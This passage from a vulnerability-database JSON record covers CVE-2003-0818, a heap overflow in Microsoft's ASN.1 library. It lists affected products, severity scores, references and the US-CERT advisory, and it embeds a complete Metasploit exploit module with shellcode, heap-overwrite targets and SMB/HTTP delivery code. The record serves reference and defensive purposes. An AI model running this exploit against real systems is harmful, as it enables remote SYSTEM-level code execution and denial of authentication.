"version": "2003"
},
{
"model": "exchange server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:microsoft:windows_2000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_nt",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_xp",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery of this vulnerability has been credited to eEye Digital Security.",
"sources": [
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0818",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2003-0818",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2003-0818",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#583108",
"trust": 0.8,
"value": "27.72"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#216324",
"trust": 0.8,
"value": "27.72"
},
{
"author": "NVD",
"id": "CVE-2003-0818",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. \nThis vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. \nIt should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. \nIssues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. \n** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##\n# $Id$\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/\n##\n\n\nrequire \u0027msf/core\u0027\n\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\n\tinclude Msf::Exploit::Remote::SMB\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t\u0027Name\u0027 =\u003e \u0027Microsoft ASN.1 Library Bitstring Heap Overflow\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\tThis is an exploit for a previously undisclosed\n\t\t\t\tvulnerability in the bit string decoding code in the\n\t\t\t\tMicrosoft ASN.1 library. Both vulnerabilities were fixed in the\n\t\t\t\tMS04-007 patch. \n\n\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\t\t\t\tthe payload fails to execute, the LSASS system service will\n\t\t\t\tcrash and the target system will automatically reboot itself\n\t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\t\t\t\tlonger be able to process authentication requests, denying\n\t\t\t\tall attempts to login through SMB or at the console. A\n\t\t\t\treboot is required to restore proper functioning of an\n\t\t\t\texploited system. \n\t\t\t\t\n\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\t\t\t\tpayloads, however a few problems were encounted when using the\n\t\t\t\tequivalent bind payloads. Your mileage may vary. \n\t\t\t\t\t\n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e [ \u0027Solar Eclipse \u003csolareclipse@phreedom.org\u003e\u0027 ],\n\t\t\t\u0027License\u0027 =\u003e GPL_LICENSE,\n\t\t\t\u0027Version\u0027 =\u003e \u0027$Revision$\u0027,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272003-0818\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u00273902\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u00279633\u0027],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],\n\t\t\t\t\t[ \u0027MSB\u0027, \u0027MS04-007\u0027],\n\n\t\t\t\t],\n\t\t\t\u0027DefaultOptions\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n\t\t\t\t},\t\t\t\t\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Payload\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027Space\u0027 =\u003e 1024,\n\t\t\t\t\t\u0027StackAdjustment\u0027 =\u003e -3500,\n\t\t\t\t},\n\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027 =\u003e \n\t\t\t\t[\n\t\t\t\t\t[ \n\t\t\t\t\t\t\u0027Windows 2000 SP2-SP4 + Windows XP SP0-SP1\u0027, # Tested OK - 11/25/2005 hdm (bind failed)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\t\t\t},\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Feb 10 2004\u0027,\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0))\n\t\t\t\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptString.new(\u0027PROTO\u0027, [ true, \"Which protocol to use: http or smb\", \u0027smb\u0027]),\n\t\t\t], self.class)\t\t\t\n\tend\n\n\t# This exploit is too destructive to use during automated exploitation. \n\t# Better Windows-based exploits exist at this time (Sep 2006)\n\tdef autofilter\n\t\tfalse\n\tend\n\n\t# This is a straight port of Solar Eclipse\u0027s \"kill-bill\" exploit, published\n\t# as a Metasploit Framework module with his permission. This module is only\n\t# licensed under GPLv2, keep this in mind if you embed the Framework into\n\t# a non-GPL application. -hdm[at]metasploit.com\n\n\tdef exploit\n\t\n\t\t# The first stage shellcode fixes the PEB pointer and cleans the heap\n\t\tstage0 = \n\t\t\t\"\\x53\\x56\\x57\\x66\\x81\\xec\\x80\\x00\\x89\\xe6\\xe8\\xed\\x00\\x00\\x00\\xff\"+\n\t\t\t\"\\x36\\x68\\x09\\x12\\xd6\\x63\\xe8\\xf7\\x00\\x00\\x00\\x89\\x46\\x08\\xe8\\xa2\"+\n\t\t\t\"\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\x6b\\xd0\\x2b\\xca\\xe8\\xe2\\x00\\x00\\x00\"+\n\t\t\t\"\\x89\\x46\\x0c\\xe8\\x3f\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\xfa\\x97\\x02\\x4c\"+\n\t\t\t\"\\xe8\\xcd\\x00\\x00\\x00\\x31\\xdb\\x68\\x10\\x04\\x00\\x00\\x53\\xff\\xd0\\x89\"+\n\t\t\t\"\\xc3\\x56\\x8b\\x76\\x10\\x89\\xc7\\xb9\\x10\\x04\\x00\\x00\\xf3\\xa4\\x5e\\x31\"+\n\t\t\t\"\\xc0\\x50\\x50\\x50\\x53\\x50\\x50\\xff\\x56\\x0c\\x8b\\x46\\x08\\x66\\x81\\xc4\"+\n\t\t\t\"\\x80\\x00\\x5f\\x5e\\x5b\\xff\\xe0\\x60\\xe8\\x23\\x00\\x00\\x00\\x8b\\x44\\x24\"+\n\t\t\t\"\\x0c\\x8d\\x58\\x7c\\x83\\x43\\x3c\\x05\\x81\\x43\\x28\\x00\\x10\\x00\\x00\\x81\"+\n\t\t\t\"\\x63\\x28\\x00\\xf0\\xff\\xff\\x8b\\x04\\x24\\x83\\xc4\\x14\\x50\\x31\\xc0\\xc3\"+\n\t\t\t\"\\x31\\xd2\\x64\\xff\\x32\\x64\\x89\\x22\\x31\\xdb\\xb8\\x90\\x42\\x90\\x42\\x31\"+\n\t\t\t\"\\xc9\\xb1\\x02\\x89\\xdf\\xf3\\xaf\\x74\\x03\\x43\\xeb\\xf3\\x89\\x7e\\x10\\x64\"+\n\t\t\t\"\\x8f\\x02\\x58\\x61\\xc3\\x60\\xbf\\x20\\xf0\\xfd\\x7f\\x8b\\x1f\\x8b\\x46\\x08\"+\n\t\t\t\"\\x89\\x07\\x8b\\x7f\\xf8\\x81\\xc7\\x78\\x01\\x00\\x00\\x89\\xf9\\x39\\x19\\x74\"+\n\t\t\t\"\\x04\\x8b\\x09\\xeb\\xf8\\x89\\xfa\\x39\\x5a\\x04\\x74\\x05\\x8b\\x52\\x04\\xeb\"+\n\t\t\t\"\\xf6\\x89\\x11\\x89\\x4a\\x04\\xc6\\x43\\xfd\\x01\\x61\\xc3\\xa1\\x0c\\xf0\\xfd\"+\n\t\t\t\"\\x7f\\x8b\\x40\\x1c\\x8b\\x58\\x08\\x89\\x1e\\x8b\\x00\\x8b\\x40\\x08\\x89\\x46\"+\n\t\t\t\"\\x04\\xc3\\x60\\x8b\\x6c\\x24\\x28\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\"+\n\t\t\t\"\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x38\\x49\\x8b\\x34\\x8b\\x01\\xee\"+\n\t\t\t\"\\x31\\xff\\x31\\xc0\\xfc\\xac\\x38\\xe0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\"+\n\t\t\t\"\\xf4\\x3b\\x7c\\x24\\x24\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\"+\n\t\t\t\"\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc2\"+\n\t\t\t\"\\x08\\x00\\xeb\\xfe\"\n\n\t\ttoken = spnego_token(stage0, payload.encoded)\n\t\t\n\t\tcase datastore[\u0027PROTO\u0027]\n\t\t\twhen \u0027smb\u0027\n\t\t\t\texploit_smb(token)\n\t\t\twhen \u0027http\u0027\n\t\t\t\texploit_http(token)\n\t\t\telse\n\t\t\t\tprint_status(\"Invalid application protocol specified, use smb or http\")\n\t\tend\n\tend\n\t\n\t\n\tdef exploit_smb(token)\n\t\tconnect\n\t\t\n\t\tclient = Rex::Proto::SMB::Client.new(sock)\n\n\t\tbegin\n\t\t\tclient.session_request(smb_hostname()) if not datastore[\u0027SMBDirect\u0027]\n\t\t\tclient.negotiate\n\t\t\tclient.session_setup_ntlmv2_blob(token)\n\t\trescue =\u003e e\n\t\t\tif (e.to_s =~ /error code 0x00050001/)\n\t\t\t\tprint_status(\"The target system has already been exploited\")\n\t\t\telse\n\t\t\t\tprint_status(\"Error: #{e}\")\n\t\t\tend\n\t\tend\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\tdef exploit_http(token)\n\t\tconnect\n\t\t\n\t\treq = \"GET / HTTP/1.0\\r\\n\"\n\t\treq \u003c\u003c \"Host: #{ datastore[\u0027RHOST\u0027]}\\r\\n\"\n\t\treq \u003c\u003c \"Authorization: Negotiate #{Rex::Text.encode_base64(token, \u0027\u0027)}\\r\\n\\r\\n\"\n\n\t\tsock.put(req)\n\t\tres = sock.get_once\n\t\t\n\t\tif (res and res =~ /0x80090301/)\n\t\t\tprint_status(\"This server does not support the Negotiate protocol or has already been exploited\")\n\t\tend\n\t\t\n\t\tif (res and res =~ /0x80090304/)\n\t\t\tprint_status(\"This server responded with error code 0x80090304 (wth?)\")\n\t\tend\t\t\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\n\t# Returns an ASN.1 encoded string\n\tdef enc_asn1(str)\n\t\tRex::Proto::SMB::Utils::asn1encode(str)\n\tend\n\n\t# Returns an ASN.1 encoded bit string with 0 unused bits\n\tdef enc_bits(str)\n\t\t\"\\x03\" + enc_asn1(\"\\x00\" + str)\n\tend\n\n\t# Returns a BER encoded constructed bit string\n\tdef enc_constr(*str_arr)\n\t\t\"\\x23\" + enc_asn1(str_arr.join(\u0027\u0027))\n\tend\n\n\t# Returns a BER encoded SPNEGO token\n\tdef spnego_token(stage0, stage1)\n\t\t\n\t\tif !(stage0 and stage1)\n\t\t\tprint_status(\"Invalid parameters passed to spnego_token\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif (stage0.length \u003e 1032)\n\t\t\tprint_status(\"The stage 0 shellcode is longer than 1032 bytes\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\ttag = \"\\x90\\x42\\x90\\x42\\x90\\x42\\x90\\x42\"\n\t\t\n\t\tif ((tag.length + stage1.length) \u003e 1033)\n\t\t\tprint_status(\"The stage 1 shellcode is too long\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\t\n\t\t# The first two overwrites must succeed, so we write to an unused location\n\t\t# in the PEB block. We don\u0027t care about the values, because after this the\n\t\t# doubly linked list of free blocks is corrupted and we get to the second\n\t\t# overwrite which is more useful. \n\n\t\tfw = \"\\xf8\\x0f\\x01\\x00\"\t\t# 0x00010ff8\n\t\tbk = \"\\xf8\\x0f\\x01\"\n\t\t\t\t\n\t\t# The second overwrite writes the address of our shellcode into the\n\t\t# FastPebLockRoutine pointer in the PEB\n\n\t\tpeblock = \"\\x20\\xf0\\xfd\\x7f\" # FastPebLockRoutine in PEB\n\t\t\t\n\t\tbitstring = enc_constr( \n\t\t\tenc_bits(\"A\" * 1024),\n\t\t\t\"\\x03\\x00\",\n\t\t\tenc_constr(\n\t\t\t\tenc_bits(tag + stage1 + (\"B\" * (1033-(tag+stage1).length))),\n\t\t\t\tenc_constr( enc_bits(fw + bk) ),\n\t\t\t\tenc_constr(\n\t\t\t\t\tenc_bits(\"CCCC\" + peblock + stage0 + (\"C\" * (1032-stage0.length))),\n\t\t\t\t\tenc_constr(\n\t\t\t\t\t\tenc_bits(\"\\xeb\\x06\" + make_nops(6)),\n\t\t\t\t\t\tenc_bits(\"D\" * 1040)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\ttoken = \"\\x60\" + enc_asn1( # Application Constructed Object\n\t\t\t\"\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\" + # SPNEGO OID\n\t\t\t\"\\xa0\" + enc_asn1(\t\t\t\t\t # NegTokenInit (0xa0)\n\t\t\t\t\"\\x30\" + enc_asn1(\n\t\t\t\t\t\"\\xa1\" + enc_asn1(\n\t\t\t\t\t\tbitstring\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\treturn token\t\n\tend\n\nend\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nMultiple Vulnerabilities in Microsoft ASN.1 Library\n\n Original issue date: February 10, 2004\n Last revised: --\n Source: US-CERT\n\n A complete revision history is at the end of this document. According to information from eEye Digital Security,\n the vulnerabilities involve integer overflows and other flaws in\n integer arithmetic. \n\n Any application that loads the ASN.1 library could serve as an attack\n vector. In particular, ASN.1 is used by a number of cryptographic and\n authentication services such as digital certificates (x.509),\n Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are\n affected. The Local Security Authority Subsystem (lsass.exe) and a\n component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1\n library. \n\nSolution\n\nApply a patch\n\n Apply the appropriate patch as specified by Microsoft Security\n Bulletin MS04-007. \n\nVendor Information\n\n This appendix contains information provided by vendors. When vendors\n report new information, this section is updated and the changes are\n noted in the revision history. If a vendor is not listed below, we\n have not received their comments. \n\nMicrosoft\n\n Please see Microsoft Security Bulletin MS04-007. \n\nReferences\n\n * Vulnerability Note VU#216324 -\n \u003chttp://www.kb.cert.org/vuls/id/216324\u003e\n * Vulnerability Note VU#583108 -\n \u003chttp://www.kb.cert.org/vuls/id/583108\u003e\n * eEye Digital Security Advisory AD20040210 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210.html\u003e\n * eEye Digital Security Advisory AD20040210-2 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210-2.html\u003e\n * Microsoft Security Bulletin MS04-007 -\n \u003chttp://microsoft.com/technet/security/bulletin/MS04-007.asp\u003e\n * Microsoft Knowledge Base Article 252648 -\n \u003chttp://support.microsoft.com/default.aspx?scid=252648\u003e\n _________________________________________________________________\n\n These vulnerabilities were researched and reported by eEye Digital\n Security. Information from eEye and Microsoft was used in this\n document. \n _________________________________________________________________\n\n Feedback can be directed to the author, Art Manion. \n\n Copyright 2004 Carnegie Mellon University. \n\n Revision History\n\n February 10, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW\n5hU8LQ/oOC4sI8PpnkppCyg=\n=Oe/N\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
},
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
}
],
"trust": 4.14
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=153",
"trust": 0.3,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108",
"trust": 4.0
},
{
"db": "NVD",
"id": "CVE-2003-0818",
"trust": 3.5
},
{
"db": "CERT/CC",
"id": "VU#216324",
"trust": 2.9
},
{
"db": "USCERT",
"id": "TA04-041A",
"trust": 2.6
},
{
"db": "BID",
"id": "13300",
"trust": 1.2
},
{
"db": "BID",
"id": "9635",
"trust": 1.1
},
{
"db": "XF",
"id": "15039",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6
},
{
"db": "BID",
"id": "9633",
"trust": 0.3
},
{
"db": "EXPLOIT-DB",
"id": "153",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83044",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32667",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"id": "VAR-200403-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-08-14T12:57:20.421000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/nitishbadole/oscp-note-2 "
},
{
"title": "OSCP",
"trust": 0.1,
"url": "https://github.com/H3n2yk/OSCP "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/rmsbpro/rmsbpro "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://www.kb.cert.org/vuls/id/583108"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html"
},
{
"trust": 2.0,
"url": "http://www.kb.cert.org/vuls/id/216324"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972617367\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643892224825\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643836125615\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972723080\u0026w=2"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/default.aspx?scid=252648"
},
{
"trust": 1.6,
"url": "http://www.itu.int/itu-t/asn1/"
},
{
"trust": 1.6,
"url": "http://www.asn1.org/"
},
{
"trust": 1.4,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/bid/13300"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 0.9,
"url": "/archive/1/354227"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html"
},
{
"trust": 0.8,
"url": "http://www.ciac.org/ciac/bulletins/o-065.shtml"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/15039"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/wr/2004/wr040701.txt"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/at/2004/at040001.txt"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta04-041a/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta04-041a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/9635"
},
{
"trust": 0.8,
"url": "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf"
},
{
"trust": 0.8,
"url": "http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html"
},
{
"trust": 0.8,
"url": "http://www.cyberpolice.go.jp/important/20040211_084159.html"
},
{
"trust": 0.3,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/"
},
{
"trust": 0.3,
"url": "http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html"
},
{
"trust": 0.3,
"url": "/archive/1/353320"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/153/"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill"
},
{
